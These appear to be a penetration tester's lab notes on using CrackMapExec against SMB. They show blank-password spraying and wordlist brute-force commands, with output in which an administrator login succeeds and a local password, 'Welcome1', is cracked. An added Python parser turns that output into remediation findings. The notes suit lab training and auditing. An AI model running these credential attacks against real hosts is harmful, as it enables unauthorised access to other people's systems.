CRACKMAPEXEC (SMB, ETC)
DISPLAY HELP
root@oco:~$ crackmapexec {protocol} -h
PASSWORDLESS SMB MISCONFIGURATION
root@oco:~$ crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p "" -t 1024
SMB 10.129.95.200 445 TACTICS [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
SMB 10.129.95.200 445 TACTICS [-] Tactics\root: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\admin: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\test: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\guest: STATUS_ACCOUNT_DISABLED
SMB 10.129.95.200 445 TACTICS [-] Tactics\info: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\adm: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\mysql: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\user: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [+] Tactics\administrator: (Pwn3d!)
* -t sets the number of threads; default threads is 256
- see crackmapexec smb -h
BRUTE FORCE
#unknown username
root@oco:~$ crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p 500-worst-passwords.txt
#known username
root@htb:~$ crackmapexec smb 10.129.150.91 -u {username} -p 500-worst-passwords.txt -d .
SMB 10.129.150.91 445 GS-SVCSCAN [*] Windows 6.1 Build 0 (name:GS-SVCSCAN) (domain:) (signing:False) (SMBv1:False)
SMB 10.129.150.91 445 GS-SVCSCAN [+] .\bob:Welcome1
* -d specifies the domain name to use during authentication
- -d MUST be specified; otherwise CME will try to guess the domain or use the username as-is, and the correct password won't be found
- {-d .} states that the user is a local account
- an alternative to {-d .} is --local-auth
- crackmapexec smb 10.129.150.91 -u bob -p test.txt --local-auth
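TURNING THE OUTPUT INTO FINDINGS
Added example, not part of the original notes or of CrackMapExec: a small parser that reads saved output in the format shown above and lists what needs fixing per host (signing not required, accounts that accepted a blank or wordlist password). The function name audit and the finding wording are made up here, and it assumes plain-text output with colour codes already stripped.

```python
import re
from collections import defaultdict

# Sample lines copied from the output shown on this page.
SAMPLE = r"""
SMB 10.129.95.200 445 TACTICS [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
SMB 10.129.95.200 445 TACTICS [-] Tactics\root: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\guest: STATUS_ACCOUNT_DISABLED
SMB 10.129.95.200 445 TACTICS [+] Tactics\administrator: (Pwn3d!)
SMB 10.129.150.91 445 GS-SVCSCAN [*] Windows 6.1 Build 0 (name:GS-SVCSCAN) (domain:) (signing:False) (SMBv1:False)
SMB 10.129.150.91 445 GS-SVCSCAN [+] .\bob:Welcome1
"""

# Layout: proto host port name [mark] rest
LINE = re.compile(r"^\S+\s+(\S+)\s+\d+\s+\S+\s+\[([*+-])\]\s+(.*)$")
FLAG = re.compile(r"\((signing|SMBv1):(True|False)\)")
CRED = re.compile(r"^([^\\]*)\\([^:]+):(.*)$")  # domain\user:secret

def audit(text):
    """Return {host: [finding, ...]} for saved CME SMB output."""
    findings = defaultdict(list)
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        host, mark, rest = m.groups()
        if mark == "*":  # banner line: protocol settings of the host
            flags = dict(FLAG.findall(rest))
            if flags.get("signing") == "False":
                findings[host].append("SMB signing not required")
            if flags.get("SMBv1") == "True":
                findings[host].append("SMBv1 enabled")
        elif mark == "+" and (c := CRED.match(rest)):  # accepted logon
            domain, user, tail = c.groups()
            admin = "(Pwn3d!)" in tail  # CME's marker for admin access
            secret = tail.replace("(Pwn3d!)", "").strip()
            issue = ("guessable" if secret else "blank") + " password accepted"
            if admin:
                issue += ", admin access"
            scope = "local account" if domain == "." else f"domain {domain}"
            # The password itself is deliberately left out of the finding.
            findings[host].append(f"{user} ({scope}): {issue}")
    return dict(findings)

if __name__ == "__main__":
    for host, items in audit(SAMPLE).items():
        print(host, *items, sep="\n  ")
```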